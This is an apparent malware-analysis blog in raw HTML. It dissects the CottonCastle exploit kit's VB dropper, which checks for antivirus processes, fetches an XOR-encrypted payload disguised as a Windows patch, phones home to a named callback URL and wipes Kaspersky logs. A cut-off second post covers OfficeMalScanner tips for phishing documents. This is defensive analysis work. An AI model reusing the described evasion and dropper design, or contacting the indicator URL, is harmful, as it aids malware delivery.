<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEF49VZobdVxdWGGSy3z2q2QMht66kVDAXBI9-Swv95HFJX6-QilYYLde-2aZNnQGvuOyP9hILUbrgY2pxv2qxuL100SrQik8zSct4wdSjGpLg0lXbjAnIsjNtfe5bt9PAF8t4OyHk9ofL/s1600/encoded_VB_script.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiEF49VZobdVxdWGGSy3z2q2QMht66kVDAXBI9-Swv95HFJX6-QilYYLde-2aZNnQGvuOyP9hILUbrgY2pxv2qxuL100SrQik8zSct4wdSjGpLg0lXbjAnIsjNtfe5bt9PAF8t4OyHk9ofL/s1600/encoded_VB_script.PNG" height="113" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of encoded VB script</span></i> </div>
</div>
<br />
The VB script is decoded and executed by the following JavaScript:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPnuI2dtCM2135QE1uQ0Ks6okzw2oUugKlrUPPsZ5OtqAL6T5NKzn6plLISQDnYV34kPFwAOgPFX3pWtO7WhE7_I4TSEOTczjEzHSPq8Lkr35CRI2Nj4MZNW2EOsVLrey73cFdPR7uJaAP/s1600/VB_decoding_JS.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPnuI2dtCM2135QE1uQ0Ks6okzw2oUugKlrUPPsZ5OtqAL6T5NKzn6plLISQDnYV34kPFwAOgPFX3pWtO7WhE7_I4TSEOTczjEzHSPq8Lkr35CRI2Nj4MZNW2EOsVLrey73cFdPR7uJaAP/s1600/VB_decoding_JS.PNG" height="219" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JavaScript that decodes and executes the embedded VB script</span></i></div>
<br />
List of operations performed by the VB script:<br />
<ul>
<li>query list of all running processes</li>
<li>check results of the query against a pre-defined list of processes</li>
<li>callback to a pre-defined URL if a blacklisted process is detected</li>
<li>build filename and filepath for malware payload</li>
<li>download, decode and execute the malware payload</li>
<li>callback to a pre-defined URL reporting a successful deployment</li>
</ul>
<div>
The list of running processes is pulled from the '<span style="color: #3d85c6;">WMI service</span>'.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13lYnwdT5O1lK8itUc4Do16cw81RJ80arSQ-oOR-kwE2nwsJtYkt3ZKs2BG0zP0HJqTqMZ5CYbdjDSgsHO4bB87xnYGRLvOoHIWGlksMgr_JWFXNrQhSlvp77EEzeNuTkpb7p5dhQu7zU/s1600/VB_running_processes.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi13lYnwdT5O1lK8itUc4Do16cw81RJ80arSQ-oOR-kwE2nwsJtYkt3ZKs2BG0zP0HJqTqMZ5CYbdjDSgsHO4bB87xnYGRLvOoHIWGlksMgr_JWFXNrQhSlvp77EEzeNuTkpb7p5dhQu7zU/s1600/VB_running_processes.PNG" height="26" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of VB script creating the list of running processes</span></i></div>
<div>
<br /></div>
<div>
The generated list is checked against the list of process names belonging to some security products - 38 in total. Each entry on the list is formatted - '<i><span style="color: #3d85c6;">code_letter</span></i><b>:</b><span style="color: #3d85c6;"><i>process_name</i></span><b>,</b>'. <u>NOTE</u>: the list below contains only the product or service names. Filenames corresponding to these services/products were purposely left out.</div>
<div>
<div>
<ul>
<li>AVG Scanning Core Module - Server Part</li>
<li>AVG Watchdog Service</li>
<li>Ad-Aware Antivirus Service</li>
<li>ArcaVir</li>
<li>Avast! Service</li>
<li>Avira Scheduler</li>
<li>BitDefender Agent</li>
<li>BullGuard Behavioural Detection</li>
<li>CA eTrust Antivirus</li>
<li>Comodo Agent Service</li>
<li>Dr. Web</li>
<li>ESET Service</li>
<li>F-Secure Host Process</li>
<li>G DATA Personal Firewall</li>
<li>Ikarus Security Software</li>
<li>Jetico Personal Firewall</li>
<li>K7TotalSecurity Service Manager</li>
<li>Kaspersky Lab</li>
<li>McAfee Service Host</li>
<li>Microsoft Security Client User Interface</li>
<li>Norman Privacy Tools</li>
<li>Norton 360</li>
<li>Norton AV</li>
<li>Norton Internet Security</li>
<li>Omniquad firewall or Dynamic Security Agent or AGuardDogSuite</li>
<li>Outpost Firewall</li>
<li>PC Tools Security Service</li>
<li>PC Tools ThreatFire Service</li>
<li>Panda Software Controller</li>
<li>Rising Antivirus</li>
<li>Solo Antivirus</li>
<li>Solo Scheduler</li>
<li>Sophos Administrator Service</li>
<li>Sophos Anti-Virus</li>
<li>Trend Micro Anti-Malware Solution Platform</li>
<li>TrustPort Antivirus Management Agent</li>
<li>ZoneAlarm ForceField</li>
</ul>
</div>
</div>
<div>
Interestingly enough, only two of the products are actually blacklisted - '<span style="color: #3d85c6;">Norton 360</span>' and '<span style="color: #3d85c6;">Norton Internet Security</span>'. If a blacklisted process is found the script will call '<span style="color: #3d85c6;">http://bretan.key-updates.pw:4433/forum/posting/</span>' + '<span style="color: #3d85c6;">1000/</span>' + the '<span style="color: #3d85c6;"><i>code_letter</i></span>' corresponding to the detected process. Otherwise, it proceeds with creating the filename for the malware payload.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ9X-3u6UoF0DYJgFzITKaOd3_OsysZEippbVxx_BnFWnmuUtZ-4Ea4R-smkKdQRCvakw4gjbKVxCdPyWR2wwxHGEo-M2igeddblfwz-vFGEkANtK8cUnYwVjg5l7araF5ZRiw2oiLA4XN/s1600/VB_filename_creation.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhZ9X-3u6UoF0DYJgFzITKaOd3_OsysZEippbVxx_BnFWnmuUtZ-4Ea4R-smkKdQRCvakw4gjbKVxCdPyWR2wwxHGEo-M2igeddblfwz-vFGEkANtK8cUnYwVjg5l7araF5ZRiw2oiLA4XN/s1600/VB_filename_creation.PNG" height="80" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of VB script creating the filename for the malware payload</span></i></div>
<div>
<br /></div>
<div>
Here is another rather strange '<span style="color: #3d85c6;">twist</span>'. If you take a look at the screenshot above you'll notice that the name is created based on a condition. The '<span style="color: #3d85c6;">ap</span>' variable is evaluated and, depending on the result, the prefix of the filename is selected. The value '<span style="color: #3d85c6;">a</span>' corresponds to '<span style="color: #3d85c6;">avast! Service</span>'. I'm not quite sure why this product receives a '<span style="color: #3d85c6;">special treatment</span>', but the possible filenames for the malware payload are '<span style="color: #3d85c6;">Windows-Patch-KB874923-x86.exe</span>' or '<span style="color: #3d85c6;">Windows-KB874923-x86.exe</span>'. The file is saved to the folder specified by the '<span style="color: #3d85c6;">%TMP%</span>' environment variable. Before being saved to disk, the file is run through an XOR routine that decrypts it. The decryption key is stored in plain text in the VB script; in this particular sample it is '<span style="color: #3d85c6;">e2400a24ac76b37cb0adff1dfd022e08</span>'. Once decrypted and saved, the file is executed using '<span style="color: #3d85c6;">cmd.exe</span>'. The spawned '<span style="color: #3d85c6;">black screen</span>' console window tries to calm a worried user down with '<span style="color: #3d85c6;">echo Install Windows Updates</span>'.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjudf9jJACeTqS2mqclCXWvRo0G3emWhQMQQVinuNIqbjbs4_VTJ-uPZOv8fSQYYKB8-nJSwsnxM-gEL7gQ6pR6FIPLGNJZSUsCZtxsm7Pxgc9G8V74gn-JavGvi7kii4dxbAvcA-xYvsYj/s1600/VB_XORing_execution.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjudf9jJACeTqS2mqclCXWvRo0G3emWhQMQQVinuNIqbjbs4_VTJ-uPZOv8fSQYYKB8-nJSwsnxM-gEL7gQ6pR6FIPLGNJZSUsCZtxsm7Pxgc9G8V74gn-JavGvi7kii4dxbAvcA-xYvsYj/s1600/VB_XORing_execution.PNG" height="46" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of VB script that performs decryption and execution</span></i></div>
<div>
<br /></div>
<div>
The last thing the script does is generate the callback URL. The format is the same as in the blacklisted-process case, except for the middle part: instead of '<span style="color: #3d85c6;">1000/</span>' it uses '<span style="color: #3d85c6;">111/</span>'.</div>
<div>
<br /></div>
<div>
At this stage control is passed back to the '<span style="color: #3d85c6;">j.dat</span>' JavaScript, which performs its very last operation - '<span style="color: #3d85c6;">clean up</span>'.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVExcyBqvWZxLJzdMma0SXPRk9fohqDtO4pYjkch-B3oMsa_v9S6J1tvpeq0V0UEbDOtlfsby5NLK6xpDsSg4WIOzelcspK6FexNp1NolWJQj4WDehFe5FgYR5DdLmH1oamb2TjMOSlhQ6/s1600/JS_cleanup.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiVExcyBqvWZxLJzdMma0SXPRk9fohqDtO4pYjkch-B3oMsa_v9S6J1tvpeq0V0UEbDOtlfsby5NLK6xpDsSg4WIOzelcspK6FexNp1NolWJQj4WDehFe5FgYR5DdLmH1oamb2TjMOSlhQ6/s1600/JS_cleanup.PNG" height="45" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of JavaScript showing the '<span style="color: #3d85c6;">clean up</span>' function</span></i></div>
<div>
<br /></div>
<div>
The script takes good care cleaning up the '<span style="color: #3d85c6;">leftovers</span>'. In another rather interesting '<span style="color: #3d85c6;">twist</span>', '<span style="color: #3d85c6;">Kaspersky Labs</span>' gets '<span style="color: #3d85c6;">special treatment</span>' during this process. On top of deleting the temporary files created during the overall execution, the script deletes the content of the '<span style="color: #3d85c6;">Kaspersky Lab</span>' folder located in '<span style="color: #3d85c6;">%programdata%</span>' (Win Vista+) or '<span style="color: #3d85c6;">%allusersprofile%</span>' (Win XP). '<span style="color: #3d85c6;">Kaspersky Labs</span>' products keep application tracing '<span style="color: #3d85c6;">.LOG</span>' files in this location, so most likely the script is cleaning it out to remove its traces there too.</div>
<div>
<br /></div>
<div>
This concludes the Java analysis part, so let's sum things up a little. I have to admit it was a rather interesting '<span style="color: #3d85c6;">descent</span>' for me. I don't want to sound as if I'm admiring someone with malicious intentions, but as a techie I have to say it's a nicely written piece of code. The use of <a href="http://en.wikipedia.org/wiki/Minification_%28programming%29" rel="nofollow" target="_blank">Minification</a> and 3 different programming languages is actually quite cool. The JavaScript in '<span style="color: #3d85c6;">j.dat</span>' was a particularly interesting piece. At some point I even started wondering whether this EK could be '<span style="color: #3d85c6;">state sponsored</span>' work, but that would be just silly, right? One thing I was not able to figure out is the purpose of the Windows PE file. It's only 2.5KB in size with 3 really short functions inside. Anyway, the Java part of this EK is fairly complex - detection evasion through encryption, system reconnaissance, support for blacklisting certain processes, a clean up procedure. The overall observation is that the Java part of '<span style="color: #3d85c6;">CottonCastle EK</span>' focuses more on staying undetected than on being successful.</div>
<div>
<br /></div>
<div>
<b><span style="color: #3d85c6;">If you build it, he will come.</span></b></div>
<div>
<br /></div>
<div>
Since this sample doesn't have the '<span style="color: #3d85c6;">Shockwave Flash Player</span>' exploit part (<a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a> has covered this in one of his blog <a href="http://malware.dontneedcoffee.com/2014/06/cve-2014-0515-flash-1300182-and-earlier.html" rel="nofollow" target="_blank">posts</a>), the last component of '<span style="color: #3d85c6;">CottonCastle EK</span>' we have in this sample is the '<span style="color: #3d85c6;">IE</span>' exploit part. As mentioned at the beginning of the post, after collecting some of the values related to the browser environment a GET request is sent to the server. If the server is satisfied with the request it returns an HTML page with a JavaScript that decodes a blob of data stored in one of the variables.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGhXXjZPUklFek5hrRdxadQ_uFjvs9_WQk8tGv8y4TsqI475s9pBnnDqxR58_PrmFH5oRn5T3eoqWITVHTn_na9J7b_Un6VpF73hsSHf30GgNGx_cBYWdKDUofdr9dwAJJdu0LsblGn8A/s1600/data_blob_example.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGhXXjZPUklFek5hrRdxadQ_uFjvs9_WQk8tGv8y4TsqI475s9pBnnDqxR58_PrmFH5oRn5T3eoqWITVHTn_na9J7b_Un6VpF73hsSHf30GgNGx_cBYWdKDUofdr9dwAJJdu0LsblGn8A/s1600/data_blob_example.PNG" height="88" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Example of the data blob</span></i></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5ybwEj-YSwfQF6Ps8suN5wkTuxLh6CXKEX0m3Bz1wj03XveEW9Nnkin4TRtjjcmDTcA6YpYLKF10UGDR1XC6UAwu7FzZRiEblvARhjr7J87-Po4bejr1Hb3mCIjyWapXjZcnkEN5lewH/s1600/data_blob_decoding_JS.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz5ybwEj-YSwfQF6Ps8suN5wkTuxLh6CXKEX0m3Bz1wj03XveEW9Nnkin4TRtjjcmDTcA6YpYLKF10UGDR1XC6UAwu7FzZRiEblvARhjr7J87-Po4bejr1Hb3mCIjyWapXjZcnkEN5lewH/s1600/data_blob_decoding_JS.PNG" height="239" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">JavaScript that decodes the data blob</span></i></div>
<div>
<br /></div>
<div>
The result of the decoding is another JavaScript.</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtY2vdOZb8phbPvYqHHlRN6zTslXSW2sZR2psPUiB9K20suEH-TmhLG3JC4w2HVcSCrDWxYQeVb5m2x1Y3clbJuv0hlKdTliIJJco3yDEQdSnjjalKKYSJ6z0RH4BDd3zIrhjsM5YalWeg/s1600/VML_exploit.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtY2vdOZb8phbPvYqHHlRN6zTslXSW2sZR2psPUiB9K20suEH-TmhLG3JC4w2HVcSCrDWxYQeVb5m2x1Y3clbJuv0hlKdTliIJJco3yDEQdSnjjalKKYSJ6z0RH4BDd3zIrhjsM5YalWeg/s1600/VML_exploit.PNG" height="134" width="320" /></a></div>
<div style="text-align: center;">
<i><span style="font-size: x-small;">Part of the decoded JavaScript showing indicators of '<span style="color: #3d85c6;">CVE-2013-2551</span>' exploit code</span></i></div>
<div>
<br /></div>
<div>
Thanks to <a href="https://twitter.com/regenpijp1" rel="nofollow" target="_blank">@regenpijp</a> for help identifying the vulnerability this exploit code is targeting - <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2551" rel="nofollow" target="_blank">CVE-2013-2551</a>.</div>
<div>
<br />
Additional information on this EK can be found here - <a href="http://malware.dontneedcoffee.com/2014/06/cottoncastle.html">http://malware.dontneedcoffee.com/2014/06/cottoncastle.html</a><br />
<br /></div>
<div>
This concludes '<span style="color: #3d85c6;">CottonCastle EK</span>' analysis. For the information on the delivered payload please see the summary table below.</div>
<div>
<br /></div>
<div>
<br />
<div class="CSSTableGenerator">
<table>
<tbody>
<tr>
<td style="background-color: #f79646; color: white;"><b>Summary Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Name:</td>
<td style="background-color: #b8cce4; color: black;">CottonCastle Exploit Kit</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date captured:</td>
<td style="background-color: #b8cce4; color: black;">2014-06-06</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Date analysed:</td>
<td style="background-color: #b8cce4; color: black;">2014-06-07</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Source/Credits:</td>
<td style="background-color: #b8cce4; color: black;">Data source - <a href="https://twitter.com/Set_Abominae" rel="nofollow" target="_blank">@Set_Abominae</a>.<br />
Intel source - <a href="https://twitter.com/kafeine" rel="nofollow" target="_blank">@kafeine</a></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Infection vectors detected:</td>
<td style="background-color: #b8cce4; color: black;">Java / Shockwave Flash Player / Internet Explorer</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Vulnerabilities targeted:</td>
<td style="background-color: #b8cce4; color: black;">CVE-2013-0422<br />
CVE-2013-2551<br />
CVE-2014-0515</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Landing page</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">TDS:</td>
<td style="background-color: #b8cce4; color: black;">Multi redirect chain</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JNLP:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JVM parameters:</td>
<td style="background-color: #b8cce4; color: black;">Yes</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Java infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Captured with:</td>
<td style="background-color: #b8cce4; color: black;">Java 1.7.05</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Obfuscation:</td>
<td style="background-color: #b8cce4; color: black;">RC4 encrypted string values, Java Reflections, Minification</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">JAR extra content:</td>
<td style="background-color: #b8cce4; color: black;">Several RC4-encrypted files with a '.dat' extension</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload encryption/encoding:</td>
<td style="background-color: #b8cce4; color: black;">XOR, key: 'e2400a24ac76b37cb0adff1dfd022e08'</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">System Temp folder</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">Static. 'Windows-Patch-KB874923-x86.exe' or 'Windows-KB874923-x86.exe'</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Browser infection vector</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Analysed with:</td>
<td style="background-color: #b8cce4; color: black;">Internet Explorer 7</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload delivery method:</td>
<td style="background-color: #b8cce4; color: black;">URL</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload store location:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Initial Payload filename:</td>
<td style="background-color: #b8cce4; color: black;">NA</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Automated analysis</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Exploit components:</td>
<td style="background-color: #b8cce4; color: black;"><pre>JAR - <a href="https://www.virustotal.com/en/file/7b2fb564a30eb2e7d852879ddb84985b7348429b5a0896b5eeb687455644d2b3/analysis/1402310324/" rel="nofollow" target="_blank">https://www.virustotal.com/</a> (no detection)</pre>
</td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;">Delivered malware:</td>
<td style="background-color: #b8cce4; color: black;"><pre>EXE(MD5 b619fce7efde0453c06f68565a8bdbb6)
<a href="https://malwr.com/analysis/YjczZWZlOTNjZDFmNGI5NTljMDNiNjA0MzQ0NDJmOGQ/" rel="nofollow" target="_blank">https://malwr.com/</a>
<a href="https://www.virustotal.com/en/file/c527e21761a66c9666ae547c9714b7ae2690429ce21ddd5fcfa444a0643c5c9e/analysis/" rel="nofollow" target="_blank">https://www.virustotal.com</a></pre>
</td>
</tr>
<tr>
<td style="background-color: #f79646; color: white;"><b>Additional Information</b></td>
<td style="background-color: #f79646; color: white;"><br /></td>
</tr>
<tr>
<td style="background-color: #fcd5b4; color: black;"><br /></td>
<td style="background-color: #b8cce4; color: black;">The malicious Java component uses several evasion techniques: execution is gated on the values of various system/OS parameters and only proceeds when they match what the kit expects.</td>
</tr>
</tbody></table>
</div>
</div>
<div>
<br /></div>
<div>
<br /></div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-250109472373647719.post-36305224575445467622014-05-30T13:15:00.000+01:002014-05-30T13:15:29.433+01:00Dissecting Tips: OLE and Office Open XML<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin-left: 1em; margin-right: 1em;">
</div>
<br />
<br />
<u>DISCLAIMER:</u> The choice of tools is a personal preference; the same results can be achieved with a similar set of tools. This is not a step-by-step guide, just a collection of tips.<br />
<br />
If you want to try what is described below, you will need the following skills and tools:<br />
<br />
<b>Skills</b><br />
<ul>
<li>Fair understanding of Object Linking and Embedding (OLE) file structure</li>
<li>Fair understanding of Office Open XML file structure</li>
</ul>
<b>Tools</b><br />
<ul>
<li><a href="http://www.reconstructer.org/code.html" rel="nofollow" target="_blank">OfficeMalScanner</a> - MS Office forensic tool</li>
<li><a href="http://xmlexplorer.codeplex.com/" rel="nofollow" target="_blank">XML Explorer</a> - XML file viewer</li>
<li><a href="http://www.mitec.cz/ssv.html" rel="nofollow" target="_blank">SSViewer</a> - Structured Storage Viewer </li>
<li><a href="http://www.winitor.com/" rel="nofollow" target="_blank">PEStudio</a> - Windows executable file scoring tool (optional)</li>
<li>Text/Hex Editor of your choice</li>
</ul>
<br />
<u>NOTE:</u> The file samples used in this blog post were sourced from phishing emails roaming around at the end of March 2014.<br />
<br />
The fastest way to check whether an <a href="http://en.wikipedia.org/wiki/Object_Linking_and_Embedding" rel="nofollow" target="_blank">OLE</a> file has any malicious content embedded is to run it through the '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool. Two option keys do that: '<span style="color: #3d85c6;">scan</span>' and '<span style="color: #3d85c6;">info</span>'. Two switches, '<span style="color: #3d85c6;">brute</span>' and '<span style="color: #3d85c6;">debug</span>', further increase the chances of finding malicious content.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY8bjVsCdphSdnmCXplt604rewjl3zhDPPKlhOqcLqhyphenhyphenkSru4ZjBU6gBdNAG908DFymT_Z-PI4OAQJGMZcNi-XXqOH0r1BcUcBIEajSfyx2NaJB0VIRf6Gs1KmE8Rizl-X2Ro8PNbCBdcJ/s1600/OfficeMalScanner_Usage.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgY8bjVsCdphSdnmCXplt604rewjl3zhDPPKlhOqcLqhyphenhyphenkSru4ZjBU6gBdNAG908DFymT_Z-PI4OAQJGMZcNi-XXqOH0r1BcUcBIEajSfyx2NaJB0VIRf6Gs1KmE8Rizl-X2Ro8PNbCBdcJ/s1600/OfficeMalScanner_Usage.PNG" height="69" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner usage</i></span></div>
<br />
The screenshots below show the tool output for a DOC file that was attached to a phishing email. Since we do not know what is hidden inside, it makes sense to analyse the file with both options, '<span style="color: #3d85c6;">scan</span>' first.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ipce5TKxEKSHCiuipOrPPwGin2aEBYtt_m3bAnNNRF4vJSrhwaZY3eCqLzurij21_jCH2ZcWu2-OnedqjPIfw19gcRWdJW_d2XkoTDLg8dgcdWB2ImBk16H_lv6ufqdQ7dXG2HbMmPut/s1600/OfficeMalScanner_scan-vb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg3Ipce5TKxEKSHCiuipOrPPwGin2aEBYtt_m3bAnNNRF4vJSrhwaZY3eCqLzurij21_jCH2ZcWu2-OnedqjPIfw19gcRWdJW_d2XkoTDLg8dgcdWB2ImBk16H_lv6ufqdQ7dXG2HbMmPut/s1600/OfficeMalScanner_scan-vb.PNG" height="89" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">scan</span>' option output</i></span></div>
<br />
No suspicious content has been found, but note the comment at the bottom of the output: the tool recommends analysing the file with the '<span style="color: #3d85c6;">info</span>' option key.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHgFIqfvBiUVTjM25FXu4JWWJBUI6IBha2MZ5raL4o__QBNS0YqBKgwW43IVJu1VlmCStRe7PtrqddOZAbH95q7MIZwfSTzUQMWjC-SqUaIfpfAyygUfounqmP11kx9cZsUv2Ui6oaoNJG/s1600/OfficeMalScanner_info-vb.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHgFIqfvBiUVTjM25FXu4JWWJBUI6IBha2MZ5raL4o__QBNS0YqBKgwW43IVJu1VlmCStRe7PtrqddOZAbH95q7MIZwfSTzUQMWjC-SqUaIfpfAyygUfounqmP11kx9cZsUv2Ui6oaoNJG/s1600/OfficeMalScanner_info-vb.PNG" height="89" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner '<span style="color: #3d85c6;">info</span>' option output</i></span></div>
<br />
This time the tool detects an embedded VB script and dumps it to a folder. A quick glance at the script shows that it downloads and executes a file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-GudC3CzlPMKrGycoIwWT2SZ-TOfz0UJxqtU82GFgkK7OIZljgHzG0p4W0jpWLMc4S_IhhmOT9bj9MIFNM0ODQUH2aK5WkzLVowAXcl6P7h-enq8GaubTZhq904DdDprUfjoF2jOW7e6/s1600/VB_script_part.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEia-GudC3CzlPMKrGycoIwWT2SZ-TOfz0UJxqtU82GFgkK7OIZljgHzG0p4W0jpWLMc4S_IhhmOT9bj9MIFNM0ODQUH2aK5WkzLVowAXcl6P7h-enq8GaubTZhq904DdDprUfjoF2jOW7e6/s1600/VB_script_part.PNG" height="17" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>part of extracted VB script</i></span></div>
<br />
The '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool can also detect and extract embedded EXE files. The screenshot below shows the tool output when it detects an EXE file embedded in a DOC file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTo17Ya7H0PTiu-aEpErN6000i9iNur0Omjs9QJbN-_Bs9RmLgSqBQuWSfvQ1-vOLmLPz4OsgGrzaQT1_-I-tjjlCYhgglv7_dZWyfXos9ozjjIPO-y0w8vkpNhLcSrUqU32ZJvW2CQdm/s1600/DOC+EXE.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdTo17Ya7H0PTiu-aEpErN6000i9iNur0Omjs9QJbN-_Bs9RmLgSqBQuWSfvQ1-vOLmLPz4OsgGrzaQT1_-I-tjjlCYhgglv7_dZWyfXos9ozjjIPO-y0w8vkpNhLcSrUqU32ZJvW2CQdm/s1600/DOC+EXE.PNG" height="165" width="320" /></a></div>
<div style="text-align: center;">
<span style="font-size: x-small;"><i>OfficeMalScanner output - detected and dumped embedded EXE</i></span></div>
<br />
The '<span style="color: #3d85c6;">OfficeMalScanner</span>' tool can also handle <a href="http://en.wikipedia.org/wiki/Office_Open_XML" rel="nofollow" target="_blank">Office Open XML</a> files. Below is the tool output when it is used with the '<span style="color: #3d85c6;">inflate</span>' option.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
